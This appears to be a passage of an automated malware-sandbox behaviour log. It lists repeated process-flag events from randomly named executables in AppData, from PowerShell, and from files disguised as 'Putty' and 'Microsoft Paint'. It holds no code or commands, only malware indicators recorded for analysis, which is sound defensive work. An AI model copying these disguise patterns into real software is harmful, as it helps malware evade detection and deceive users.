Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\xdwdPutty.exe	Process information set: NOOPENFILEERRORBOX
